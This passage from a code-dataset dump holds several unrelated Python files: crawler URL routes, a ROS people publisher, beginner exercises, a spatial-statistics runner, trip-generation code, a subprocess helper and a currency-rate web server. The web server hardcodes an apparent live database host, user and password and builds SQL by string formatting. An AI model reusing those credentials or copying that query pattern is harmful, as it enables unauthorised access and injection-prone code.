asyncio.sleep(0.2)\n","sub_path":"plugins/misc/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"200869629","text":"from django.conf.urls import url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom . import views\nurlpatterns = [\n url(r'^add-crawler', views.Add_Crawlers.as_view(),name='add-crawler'),\n url(r'^execute-crawler', views.Execute_Main_Crawler.as_view(),name='execute-crawler'),\n url(r'^test-add', views.Test_Sample_Data.as_view(),name='test-add'),\n url(r'^fetch-params-csv', views.Fetch_Params_From_Csv.as_view(), name='fetch-csv'),\n url(r'^pick-task-row', views.Pick_TaskRow_To_Execute.as_view(), name='pick-task-row'),\n url(r'^execute-linkedin-local', views.Execute_Linkedin_Local.as_view(), name='execute-linkedin-local'),\n url(r'^pick-task-row', views.Pick_TaskRow_To_Execute.as_view(), name='pick-task-row'),\n url(r'^clean-linkedin-data', views.Scrape_Linkedin_Data.as_view(), name='clean-linkedin-data'),\n url(r'^clean-wiki-data', views.Scrape_Wiki_Data.as_view(), name='clean-wiki-data'),\n #url(r'^clean-mygov-data', views.Scrape_Mygov_Data.as_view(), name='clean-mygov-data'),\n url(r'^clean-raw-data', views.Clean_Raw_Data.as_view(), name='clean-raw-data'),\n]","sub_path":"crawlers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46583236","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nfrom nav_msgs.msg import OccupancyGrid\nfrom map_msgs.msg import OccupancyGridUpdate\nfrom group_msgs.msg import People, Person, Groups\nfrom geometry_msgs.msg import Pose, PoseArray\nfrom algorithm import SpaceModeling\nfrom obstacles import adapt_parameters\n\nfrom human_awareness_msgs.msg import PersonTracker, TrackedPersonsList\n\nimport tf\nimport math\nimport copy\nimport actionlib\nimport numpy as np\n\nimport matlab.engine\neng = matlab.engine.start_matlab()\neng.cd(r'/home/flash/catkin_ws/src/adaptive_social_layers/scripts', nargout=0)\n\nSTRIDE = 65 # in cm\nMDL = 8000\n\n# Relation between personal frontal space and back space\nBACK_FACTOR = 1.3\n\n# Robot radius\nROBOT_DIM = 100 # in cm\n\ndef calc_o_space(persons):\n \"\"\"Calculates the o-space center of the group given group members pose\"\"\"\n c_x = 0\n c_y = 0\n \n# Group size\n g_size = len(persons)\n \n for person in persons:\n c_x += person[0] + math.cos(person[2]) * STRIDE\n c_y += person[1] + math.sin(person[2]) * STRIDE\n\n center = [c_x / g_size, c_y / g_size]\n\n return center\n\ndef rotate(px, py, angle):\n \"\"\"\n Rotate a point counterclockwise by a given angle around a given origin.\n The angle should be given in radians.\n \"\"\"\n qx = math.cos(angle) * px - math.sin(angle) * py\n qy = math.sin(angle) * px + math.cos(angle) * py\n\n return qx, qy\n\ndef get_index(x, y, width):\n \"\"\" \"\"\"\n \n return (y * width) + x\n\nclass PeoplePublisher():\n \"\"\"\n \"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n rospy.init_node('PeoplePublisher', anonymous=True)\n \n rospy.Subscriber(\"/human_awareness_tracker/trackers_list\",TrackedPersonsList,self.callback,queue_size=1)\n # https://answers.ros.org/question/207620/global-map-update/\n # We need to subscribe both costmap and costmap update topic\n rospy.Subscriber(\"/map\",OccupancyGrid , self.callbackCm, queue_size=1)\n self.loop_rate = rospy.Rate(rospy.get_param('~loop_rate', 10.0))\n\n self.map_received = False\n self.pose_received = False\n\n self.data = None\n self.pub = rospy.Publisher('/people', People, queue_size=10)\n self.pubg = rospy.Publisher('/groups', Groups, queue_size=10)\n\n\n def callback(self,data):\n \"\"\"\n \"\"\"\n \n self.data = data\n self.pose_received = True\n \n\n def callbackCm(self, data):\n \"\"\" Costmap Callback. \"\"\"\n\n self.map = data\n self.map_grid = list(data.data)\n self.map_received = True\n \n def publish(self):\n \"\"\"\n \"\"\"\n \n data = self.data\n groups = []\n group = []\n\n persons = []\n\n listener = tf.TransformListener()\n\n while not rospy.is_shutdown():\n try:\n (trans,rot) = listener.lookupTransform('/map', '/base_footprint', rospy.Time(0))\n break\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n\n tx = trans[0]\n ty = trans[1]\n (_, _, t_yaw) = tf.transformations.euler_from_quaternion(rot)\n\n if not data.personList:\n groups = []\n else:\n for poseinfo in data.personList:\n\n rospy.loginfo(\"Person Detected\")\n pose = poseinfo.body_pose\n quartenion = [pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]\n (_, _, yaw) = tf.transformations.euler_from_quaternion(quartenion)\n\n \n # Pose transformation from base footprint frame to map frame\n (px, py) = rotate(pose.position.x, pose.position.y, t_yaw)\n pose_x = px + tx\n pose_y = py + ty\n pose_yaw = yaw + t_yaw\n\n\n pose_person = (pose_x * 100, pose_y * 100, pose_yaw)\n persons.append(pose_person)\n\n # Run GCFF gcff.m Matlab function \n if persons:\n groups = eng.gcff(MDL,STRIDE, matlab.double(persons))\n \n if groups:\n app = SpaceModeling(groups) # Space modeling works in cm\n pparams,gparams = app.solve()\n\n ####\n # Obstacles works in cm -> Convert to meters\n ox = self.map.info.origin.position.x * 100\n oy = self.map.info.origin.position.y * 100\n origin = [ox, oy]\n resolution = self.map.info.resolution * 100\n width = self.map.info.width \n height = self.map.info.height \n map = self.map.data\n\n pparams_adapt, gparams_adapt = adapt_parameters(groups, pparams, gparams, resolution, map, origin, width, ROBOT_DIM)\n \n\n p = People()\n p.header.frame_id = \"/map\"\n p.header.stamp = rospy.Time.now()\n\n g = Groups()\n g.header.frame_id = \"/map\"\n g.header.stamp = rospy.Time.now()\n \n for idx,group in enumerate(groups):\n aux_p = People()\n aux_p.header.frame_id = \"/map\"\n aux_p.header.stamp = rospy.Time.now()\n\n \n gvarx = float(gparams_adapt[idx][0]) / 100.0 # cm to m\n gvary = float(gparams_adapt[idx][1]) / 100.0 # cm to m\n \n \n \n ############## FIXED\n # sx = 0.9\n # sy = 0.9\n #########################\n for pidx, person in enumerate(group):\n\n p1 = Person()\n p1.position.x = person[0] / 100.0 # cm to m\n p1.position.y = person[1] / 100.0 # cm to m\n p1.orientation = person[2]\n\n sx = pparams_adapt[idx][pidx][\"sx\"]/ 100.0\n sy = pparams_adapt[idx][pidx][\"sy\"] / 100.0\n\n sx_back = pparams_adapt[idx][pidx][\"sx_back\"] / 100.0\n \n p1.sx = sx \n p1.sy = sy \n p1.sx_back = sx_back \n \n p1.ospace = False\n p.people.append(p1)\n\n \n aux_p.people.append(p1)\n \n # Only represent o space for +2 individuals\n if len(group) > 1:\n p1 = Person()\n center = calc_o_space(group)\n p1.position.x = center[0] / 100.0 # cm to m\n p1.position.y = center[1] / 100.0 # cm to m\n p1.orientation = math.pi\n\n \n p1.sx = gvarx\n p1.sy = gvary\n\n \n p1.ospace = True\n p.people.append(p1)\n\n aux_p.people.append(p1)\n\n g.groups.append(aux_p)\n\n self.pub.publish(p)\n \n self.pubg.publish(g)\n\n else:\n p = People()\n p.header.frame_id = \"/map\"\n p.header.stamp = rospy.Time.now()\n self.pub.publish(p)\n\n g = Groups()\n g.header.frame_id = \"/map\"\n g.header.stamp = rospy.Time.now()\n self.pubg.publish(g)\n\n def run_behavior(self):\n while not rospy.is_shutdown():\n if self.pose_received:\n self.pose_received = False\n\n if self.map_received:\n #self.map_received = False\n\n self.publish()\n \n\nif __name__ == '__main__':\n people_publisher = PeoplePublisher()\n people_publisher.run_behavior()\n eng.quit()","sub_path":"scripts/people_publisher_obstacles_vision.py","file_name":"people_publisher_obstacles_vision.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424348518","text":"#!/usr/bin/env python3\nfirst_name = \"Casey\"\nlast_name = \"Jackson\"\nfull_name = first_name + last_name\nprint(full_name)\nfullName = \"Casey\" \" \" \"Jackson\"\nprint(fullName)\n\nstars = \"*\" * 12\npounds = 5 * \"#\"\nprint(stars, \":\", pounds)\nx = \"Hello there\"\nprint('t' in x, 'ell' in x, 'hell' in x)\n","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319733162","text":"# CS39AB - Cloud Computing - Summer 2021\n# Instructor: Thyago Mota\n# Description: Activity 11 - Extract the dollar to real exchange rate, saving it into a database. All quotes are then displayed using a dynamically generated web page. \n\nimport requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport mysql.connector\nimport os\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nEXCHANGE_RATE_URL = 'https://themoneyconverter.com/USD/BRL'\n\nclass MyHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n\n # only accept self.path = \"/\"\n if self.path != '/':\n return \n\n # get quote and update db\n req = requests.get(EXCHANGE_RATE_URL)\n soup = BeautifulSoup(req.content, 'html.parser')\n el = soup.find('output')\n exch_rate = float(el.text.split(' ')[3])\n today = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n sql = f\"INSERT INTO quotes VALUES ('{today}', {exch_rate})\"\n cursor = self.db.cursor()\n cursor.execute(sql)\n db.commit()\n\n # generate a response\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n self.wfile.write(bytes('''\n \n \n Dollar to Real\n \n \n ''', \"utf-8\"))\n self.wfile.write(bytes('''\n \n \n \n \n \n \n \n \n \n \n ''', \"utf-8\"))\n sql = \"SELECT `datetime`, quote FROM quotes ORDER BY `datetime` DESC\"\n cursor = self.db.cursor(buffered = True)\n cursor.execute(sql)\n for date_time, quote in cursor:\n date = date_time.date()\n time = date_time.time()\n self.wfile.write(bytes(f\"\", \"utf-8\")) \n self.wfile.write(bytes('''\n \n
DateTimeExchange Rate
{date}{time}{quote}
\n \n \n ''', \"utf-8\"))\n\nif __name__ == \"__main__\":\n\n # delete the following lines once you are satisfied with the db connection and before creating the docker image\n os.environ['DB_HOST'] = 'dollar2real.cvhpjdm21h9e.us-west-1.rds.amazonaws.com'\n os.environ['DB_NAME'] = 'dollar2real'\n os.environ['DB_USER'] = 'dollar2real'\n os.environ['DB_PASSWORD'] = '135791'\n\n # attempt to connect to MySQL\n db = mysql.connector.connect(\n host = os.getenv('DB_HOST'),\n database = os.getenv('DB_NAME'),\n user = os.getenv('DB_USER'),\n password = os.getenv('DB_PASSWORD')\n )\n\n # attempt to start a web server\n my_handler = MyHandler \n my_handler.db = db\n webServer = HTTPServer(('0.0.0.0', 8000), my_handler)\n print(\"Ready to serve!\")\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n db.close()","sub_path":"hwk_04_docker/src/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161760878","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Spatial AutoCorrelation - Run Script\n ~~~~~~~~~\n\n Run with:\n python run_morans.py shapefiles/my_shapes.shp \\\n 'Density_Col' 'Population_Col' 'etc_col' -f 'Filter_Col'\n\n :copyright: (c) 2015 by Joe Hand, Santa Fe Institute.\n :license: MIT\n\"\"\"\nimport argparse\nimport logging\nimport pickle\nimport time\n\nfrom datetime import timedelta\n\nimport pandas as pd\n\nfrom spatial_auto import run_moran_analysis\n\nparser = argparse.ArgumentParser(\n description=\"Run Moran's on Shapefile (optional filter)\")\nparser.add_argument('shapefile', type=str,\n help='source shapefile for analysis')\nparser.add_argument('analysis_vars', nargs='+',\n help='columns to run Morans I analysis on')\nparser.add_argument('-f', '--filter', type=str,\n help='Filter Shapefile by Column (Optional)')\nparser.add_argument('--show-logs', dest='log', action='store_true')\nparser.add_argument('--no-logs', dest='log', action='store_false')\nparser.set_defaults(log=True)\nparser.add_argument('--logs-file', dest='log_file', action='store_true')\nparser.set_defaults(log_file=False)\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n t = time.process_time()\n if args.log_file:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n filename='morans.log', level=logging.DEBUG,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n elif args.log:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n level=logging.DEBUG,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n else:\n logging.basicConfig(format='%(asctime)s \\n \\t %(message)s',\n level=logging.WARNING,\n datefmt='%m/%d/%Y %I:%M:%S %p')\n if args.filter:\n filter_col = args.filter\n else:\n filter_col = None\n\n logging.info('Starting Analysis')\n try:\n results = run_moran_analysis(\n args.shapefile, args.analysis_vars, filter_column=filter_col)\n pickle.dump(results, open( \"results.p\", \"wb\" ))\n except (SystemExit, KeyboardInterrupt):\n raise\n except Exception as e:\n logging.exception('\\n\\nError: ')\n\n logging.info('Finished Calculations \\n\\n')\n\n try:\n results_df = []\n keys = []\n for shapefile, values in results:\n df = pd.DataFrame(values).transpose()\n if shapefile in keys:\n val = 1\n while True:\n shapefile = '{}_{}'.format(shapefile,val)\n if shapefile not in keys:\n break\n val += 1\n keys.append(shapefile)\n del(df['COLUMN']) # add this as a key later\n results_df.append(df)\n\n results_log = '{} RESULTS \\n'.format(shapefile.upper())\n results_log += df.to_string()\n results_log += '\\n'\n logging.debug(results_log)\n results_df = pd.concat(results_df, keys=keys, names=['CITY', 'COLUMN'], axis=0)\n results_df.to_csv('results.csv')\n except:\n logging.exception('Some error exporting results: ')\n logging.debug('Total elapsed time {}'.format(\n str(timedelta(seconds=time.process_time() - t))))\n","sub_path":"run_morans.py","file_name":"run_morans.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"199735316","text":"import copy\nimport datetime\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\ndef smoothen_triplegs(triplegs, method='douglas-peucker', tolerance=1.0):\n \"\"\"reduces number of points while retaining structure of tripleg\n Parameters\n ----------\n triplegs: shapely file\n triplegs to be reduced\n method: method used to smoothen\n only the douglas-peucker method is available so far\n tolerance: float\n a higher tolerance removes more points; the units of tolerance are the same as the projection of the input geometry\n \"\"\"\n input_copy = copy.deepcopy(triplegs)\n origin_geom = input_copy.geom\n simplified_geom = origin_geom.simplify(tolerance, preserve_topology=False)\n input_copy.geom = simplified_geom\n\n return input_copy\n\ndef _temp_trip_stack_has_tripleg(temp_trip_stack):\n \"\"\"\n Check if a trip has at least 1 tripleg\n Parameters\n ----------\n temp_trip_stack : list\n list of dictionary like elements (either pandas series or\n python dictionary). Contains all elements\n that will be aggregated into a trip\n\n Returns\n -------\n Bool\n \"\"\"\n\n has_tripleg = False\n for row in temp_trip_stack:\n if row['type'] == 'tripleg':\n has_tripleg = True\n break\n\n return has_tripleg\n\n\ndef _create_trip_from_stack(temp_trip_stack, origin_activity, destination_activity):\n \"\"\"\n Aggregate information of trip elements in a structured dictionary\n\n Parameters\n ----------\n temp_trip_stack : list\n list of dictionary like elements (either pandas series or python dictionary). Contains all elements\n that will be aggregated into a trip\n origin_activity : dictionary like\n Either dictionary or pandas series\n destination_activity : dictionary like\n Either dictionary or pandas series\n\n Returns\n -------\n dictionary\n\n \"\"\"\n\n # this function return and empty dict if no tripleg is in the stack\n first_trip_element = temp_trip_stack[0]\n last_trip_element = temp_trip_stack[-1]\n\n # all data has to be from the same user\n assert origin_activity['user_id'] == last_trip_element['user_id']\n\n # double check if trip requirements are fulfilled\n assert origin_activity['activity'] == True\n assert destination_activity['activity'] == True\n assert first_trip_element['activity'] == False\n\n trip_dict_entry = {'user_id': origin_activity['user_id'],\n 'started_at': first_trip_element['started_at'],\n 'finished_at': last_trip_element['finished_at'],\n 'origin_staypoint_id': origin_activity['id'],\n 'destination_staypoint_id': destination_activity['id'],\n 'tpls': [tripleg['id'] for tripleg in temp_trip_stack if tripleg['type'] == 'tripleg'],\n 'spts': [tripleg['id'] for tripleg in temp_trip_stack if tripleg['type'] == 'staypoint']}\n \n return trip_dict_entry\n\n\ndef generate_trips(stps_input, tpls_input, gap_threshold=15, id_offset=0, print_progress=False):\n \"\"\" Generate trips based on staypoints and triplegs\n\n `generate_trips` aggregates the staypoints `stps_input` and `tpls_input` into `trips` which are returned\n in a new DataFrame. The function returns new versions of `stps_input` and `tpls_input` that are identically except\n for additional id's that allow the matching between staypoints, triplegs and trips.\n\n Parameters\n ----------\n stps_input : GeoDataFrame\n Staypoints that are used for the trip generation\n tpls_input : GeoDataFrame\n Triplegs that are used for the trip generation\n gap_threshold : float\n Maximum allowed temporal gap size in minutes. If tracking data is misisng for more than `gap_threshold`\n minutes, then a new trip begins after the gap.\n id_offset : int\n IDs for trips are incremented starting from this value.\n\n Returns\n -------\n (GeoDataFrame, GeoDataFrame, GeoDataFrame)\n the tuple contains (staypoints, triplegs, trips)\n\n Notes\n -----\n Trips are an aggregation level in transport planning that summarize all movement and all non-essential actions\n (e.g., waiting) between two relevant activities.\n The function returns altered versions of the input staypoints and triplegs. Staypoints receive the fields\n [`trip_id` `prev_trip_id` and `next_trip_id`], triplegs receive the field [`trip_id`].\n The following assumptions are implemented\n - All movement before the first and after the last activity is omitted\n - If we do not record a person for more than `gap_threshold` minutes, we assume that the person performed\n an activity in the recording gap and split the trip at the gap.\n - Trips that start/end in a recording gap can have an unknown origin/destination\n - There are no trips without a (recored) tripleg\n\n Examples\n ---------\n >>> staypoints, triplegs, trips = generate_trips(staypoints, triplegs)\n\n \"\"\"\n assert 'activity' in stps_input.columns, \"staypoints need the column 'activities' \\\n to be able to generate trips\"\n\n # we copy the input because we need to add a temporary column\n tpls = tpls_input.copy()\n spts = stps_input.copy()\n\n tpls['type'] = 'tripleg'\n spts['type'] = 'staypoint'\n\n # create table with relevant information from triplegs and staypoints.\n spts_tpls = spts[['started_at', 'finished_at', 'user_id', 'type', 'activity']].append(\n tpls[['started_at', 'finished_at', 'user_id', 'type']])\n\n # create ID field from index\n spts_tpls['id'] = spts_tpls.index\n\n # transform nan to bool\n spts_tpls['activity'] = spts_tpls['activity'] == True\n\n spts_tpls.sort_values(by=['user_id', 'started_at'], inplace=True)\n spts_tpls['started_at_next'] = spts_tpls['started_at'].shift(-1)\n spts_tpls['activity_next'] = spts_tpls['activity'].shift(-1)\n \n if print_progress:\n tqdm.pandas(desc='User trip generation')\n trips = spts_tpls.groupby(['user_id'], \n group_keys=False, \n as_index=False).progress_apply(_generate_trips_user, gap_threshold=gap_threshold).reset_index(drop=True)\n else:\n trips = spts_tpls.groupby(['user_id'], \n group_keys=False, \n as_index=False).apply(_generate_trips_user, gap_threshold=gap_threshold).reset_index(drop=True)\n trips['id'] = trips.index + id_offset\n \n # assign trip_id to tpls\n trip2tpl_map = trips[['id', 'tpls']].set_index('id').to_dict()['tpls']\n ls = []\n for key, values in trip2tpl_map.items():\n for value in values:\n ls.append([value, key])\n temp = pd.DataFrame(ls, columns=[tpls.index.name, 'trip_id']).set_index(tpls.index.name)\n tpls = tpls.join(temp, how='left')\n \n # assign trip_id to spts, for non-activity spts\n trip2spt_map = trips[['id', 'spts']].set_index('id').to_dict()['spts']\n ls = []\n for key, values in trip2spt_map.items():\n for value in values:\n ls.append([value, key])\n temp = pd.DataFrame(ls, columns=[spts.index.name, 'trip_id']).set_index(spts.index.name)\n spts = spts.join(temp, how='left')\n \n # assign prev_trip_id to spts\n temp = trips[['id', 'destination_staypoint_id']].copy()\n temp.rename(columns={\"id\":\"prev_trip_id\", \"destination_staypoint_id\":spts.index.name}, inplace=True)\n temp.set_index(spts.index.name, inplace=True)\n spts = spts.join(temp, how ='left')\n \n # assign next_trip_id to spts\n temp = trips[['id', 'origin_staypoint_id']].copy()\n temp.rename(columns={\"id\":\"next_trip_id\", \"origin_staypoint_id\":spts.index.name}, inplace=True)\n temp.set_index(spts.index.name, inplace=True)\n spts = spts.join(temp, how ='left')\n \n # final cleaning\n tpls.drop(columns=['type'], inplace=True)\n spts.drop(columns=['type'], inplace=True)\n trips.drop(columns = ['tpls', 'spts'], inplace=True)\n trips.set_index('id', inplace=True)\n \n return spts, tpls, trips\n\ndef _generate_trips_user(df, gap_threshold):\n # function called after groupby: should only contain records of one user\n user_id = df['user_id'].unique()\n assert len(user_id) == 1\n user_id = user_id[0]\n\n unknown_activity = {'user_id': user_id, 'activity': True, 'id': np.nan}\n origin_activity = unknown_activity\n temp_trip_stack = []\n in_trip = False\n trip_ls = []\n\n for _, row in df.iterrows():\n \n \n # check if we can start a new trip\n # (we make sure that we start the trip with the most recent activity)\n if in_trip is False:\n # If there are several activities in a row, we skip until the last one\n if row['activity'] and row['activity_next']:\n continue\n\n # if this is the last activity before the trip starts, reset the origin\n elif row['activity']:\n origin_activity = row\n in_trip = True\n continue\n\n # if for non-activities we simply start the trip\n else:\n in_trip = True\n \n if in_trip is True:\n # during trip generation/recording\n\n # check if trip ends regularly\n if row['activity'] is True:\n\n # if there are no triplegs in the trip, set the current activity as origin and start over\n if not _temp_trip_stack_has_tripleg(temp_trip_stack):\n origin_activity = row\n temp_trip_stack = list()\n in_trip = True\n\n else:\n # record trip\n destination_activity = row\n trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity,destination_activity))\n\n # set values for next trip\n if row['started_at_next'] - row['finished_at'] > datetime.timedelta(minutes=gap_threshold):\n # if there is a gap after this trip the origin of the next trip is unknown\n origin_activity = unknown_activity\n destination_activity = None\n temp_trip_stack = list()\n in_trip = False\n\n else:\n # if there is no gap after this trip the origin of the next trip is the destination of the\n # current trip\n origin_activity = destination_activity\n destination_activity = None\n temp_trip_stack = list()\n in_trip = False\n\n # check if gap during the trip\n elif row['started_at_next'] - row['finished_at'] > datetime.timedelta(minutes=gap_threshold):\n # in case of a gap, the destination of the current trip and the origin of the next trip\n # are unknown.\n\n # add current item to trip\n temp_trip_stack.append(row)\n\n # if the trip has no recored triplegs, we do not generate the current trip.\n if not _temp_trip_stack_has_tripleg(temp_trip_stack):\n origin_activity = unknown_activity\n in_trip = True\n temp_trip_stack = list()\n\n else:\n # add tripleg to trip, generate trip, start new trip with unknown origin\n destination_activity = unknown_activity\n\n trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity,destination_activity))\n origin_activity = unknown_activity\n destination_activity = None\n temp_trip_stack = list()\n in_trip = True\n\n else:\n temp_trip_stack.append(row)\n \n # if user ends generate last trip with unknown destination\n if (len(temp_trip_stack) > 0) and (_temp_trip_stack_has_tripleg(temp_trip_stack)):\n destination_activity = unknown_activity\n trip_ls.append(_create_trip_from_stack(temp_trip_stack, origin_activity,destination_activity,))\n \n # print(trip_ls)\n trips = pd.DataFrame(trip_ls)\n return trips","sub_path":"trackintel/preprocessing/triplegs.py","file_name":"triplegs.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"315578951","text":"\"\"\"Helper functions to deal with subprocess\"\"\"\n\nimport os\nimport logging\nimport subprocess\nimport select\nimport time\nimport errno\nimport commands\ntry:\n import fcntl\nexcept ImportError:\n pass\n\n\n# http://stackoverflow.com/questions/12270645/can-you-make-a-python-subprocess-output-stdout-and-stderr-as-usual-but-also-cap\n# !!! it won't work on Windows. select() accepts sockets only on Windows\ndef run(process, check=True, show_cmd=False):\n \"\"\"Run a Linux process and log stdout as debug, stderr as warning.\n Throw a exception if the process failed (returned non-zero)\n process - the process that should run\n check - by default the process exit status is checked to raise RuntimeError\n if the exit status is not zero.\n show_cmd - by default the command to run is logging as DEBUG. set it to True\n to logging as INFO, normally will also be printed to console\n The exit status will be returned as the function's return value.\n \"\"\"\n\n if show_cmd:\n logging.info(process)\n else:\n logging.debug(process)\n\n p = subprocess.Popen(process, shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # deal with subprocess output in another function\n # to avoid pylint warning Too many branches\n _nonblocking_read(p.stdout.fileno(), p.stderr.fileno(), _1, _2)\n\n returncode = p.wait()\n returnmsg = \"\"\"Call subprocess probably failed.\n The command line is {process}\n The return code is {retcode}\"\"\".format(process=process, retcode=returncode)\n\n if check and returncode:\n logging.debug(returnmsg)\n raise RuntimeError(returnmsg)\n elif returncode:\n logging.debug(returnmsg)\n\n return returncode\n\n\n# keep this function name short to avoid mess up the loggings in file\n# function name starts with '_' means it is an internal function\ndef _1(line):\n \"\"\"Log output line as debug\"\"\"\n logging.debug(line.rstrip())\n\n\ndef _2(line):\n \"\"\"Log output line as warning\"\"\"\n logging.warning(line.rstrip())\n\n\ndef _nonblocking_read(stdout_fd, stderr_fd, stdout_callback, stderr_callback, timeout=15):\n \"\"\"Read stdout and stderr simultaneously. This avoid the deadlock if the child\n process generates enough output to a stdout or stderr pipe such that it blocks\n waiting for the OS pipe buffer to accept more data.\n \"\"\"\n stdout_eof = False\n stderr_eof = False\n _set_nonblocking(stdout_fd)\n _set_nonblocking(stderr_fd)\n\n while True:\n rlist, _, _ = select.select([stdout_fd, stderr_fd], [], [])\n\n for fd in rlist:\n if fd == stdout_fd and not stdout_eof:\n line = _readline_with_timeout(stdout_fd, timeout)\n if line:\n stdout_callback(line)\n else:\n stdout_eof = True\n if fd == stderr_fd and not stderr_eof:\n line = _readline_with_timeout(stderr_fd, timeout)\n if line:\n stderr_callback(line)\n else:\n stderr_eof = True\n\n if stdout_eof and stderr_eof:\n break\n\n\ndef _set_nonblocking(fd):\n \"\"\"Turn fd into non blocking mode.\n Note afterward do not use python file object any more!\n \"\"\"\n flags = fcntl.fcntl(fd, fcntl.F_GETFL)\n fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK) # pylint: disable=no-member\n\n\ndef _readline_with_timeout(fd, timeout=15):\n \"\"\"file.readline with timeout. Read until '\\n' or until timeout, and return the\n read content. fd must be turned into non blocking mode. So do not use python\n file object any more! The advantage against file.readline is to avoid blocking\n if the subprocess does not output '\\n' for a long time.\n The default timeout value is well tuned that a user should see any output before\n he loses his patience and think the subprocess just \"dead\".\n \"\"\"\n content = _readline_non_blocking(fd) # fd must can read, so read it anyway\n if content:\n while content[-1] != '\\n' and timeout > 0:\n start = time.time()\n rlist, _, _ = select.select([fd], [], [], timeout)\n end = time.time()\n timeout = timeout - (end - start)\n if rlist:\n tmp = _readline_non_blocking(fd)\n if tmp:\n content += tmp\n else:\n break\n return content\n\n\ndef _readline_non_blocking(fd):\n \"\"\"call internally in _readline_with_timeout. best effort read until '\\n'.\n assume select was called before so that fd really has something can read!\n \"\"\"\n content = ''\n while True:\n try:\n tmp = os.read(fd, 1)\n if tmp:\n content += tmp\n if tmp == '\\n':\n break\n else:\n break\n except OSError as err:\n if err.errno == errno.EAGAIN:\n assert content # because by selecting fd, we know it must have content\n break\n else:\n break\n return content\n\n\ndef getoutput(cmd):\n \"\"\"A thin wrapper for commands.getoutput\"\"\"\n logging.debug('Exec shellcmd: ' + cmd)\n output = commands.getoutput(cmd)\n logging.debug('The output is: ' + output)\n return output\n\n\ndef getstatus(cmd):\n \"\"\"A thin wrapper for os.system\"\"\"\n logging.debug('Exec shellcmd: ' + cmd)\n status = os.system(cmd)\n logging.debug('The exit stat: ' + str(status))\n return status\n\n\ndef getstatusoutput(cmd):\n \"\"\"A thin wrapper for commands.getstatusoutput\"\"\"\n logging.debug('Exec shellcmd: ' + cmd)\n (status, output) = commands.getstatusoutput(cmd)\n logging.debug('The output is: ' + output)\n logging.debug('The exit stat: ' + str(status))\n return (status, output)\n","sub_path":"rda-base/src/main/python/apitools/subprocess_util.py","file_name":"subprocess_util.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284182653","text":"'''\r\n 商城:\r\n 1.初始化钱包余额\r\n 2.推个空的购物车\r\n 3.正常购物:\r\n 输入商品的编号\r\n 看是否有这个商品\r\n 有:\r\n 看钱是否足够\r\n 够:\r\n 添加到购物车里\r\n 余额减去相对应的钱\r\n 不够:\r\n 温馨:穷鬼,别瞎弄!请买个其他商品\r\n 没有:\r\n 买个其他商品,别瞎弄!\r\n 4.打印购物小条\r\n 任务:\r\n 1.购物小条的商品重复打印问题\r\n 2. 10张联想电脑 0.5, 20老干妈优惠券 0.1 , 15 华为优惠券 0.6\r\n 随机抽取一张优惠券,在结算的时候进行打折,进行结算。\r\n'''\r\nshop = [\r\n [\"联想电脑\",5000],\r\n [\"苹果电脑\",12000],\r\n [\"华为手环\",2000],\r\n [\"机械革命\",15000],\r\n [\"老 干 妈\",7.5],\r\n [\"卫龙辣条\",3],\r\n [\"西 瓜\",2]\r\n]\r\n\r\n\r\n# 1.空的购物车\r\nmycart = []\r\n\r\n# 2.初始化您的余额\r\nmoney = input(\"请充值购物卡:\")\r\nmoney = int(money)\r\nmoney_1 = money\r\n# 随机抽取优惠券\r\nimport random\r\nbond = random.randint(1,45)\r\nif bond >=1 and bond <=10:\r\n print(\"恭喜获得联想电脑5折优惠券,购买时自动使用\")\r\n price = 5000\r\n rebat = 0.5\r\n bout = 1\r\n num = 0\r\nelif bond > 10 and bond <=30:\r\n print(\"恭喜获得:老干妈 1折优惠券,购买时自动使用\")\r\n price = 7.5\r\n rebat = 0.1\r\n bout = 1\r\n num = 4\r\nelse:\r\n print(\"恭喜获得:华为手环 6折优惠券,购买时自动使用\")\r\n price = 2000\r\n rebat = 0.6\r\n bout = 1\r\n num = 2\r\n\r\n# 3.正常购物\r\ni = 1\r\nwhile i <= 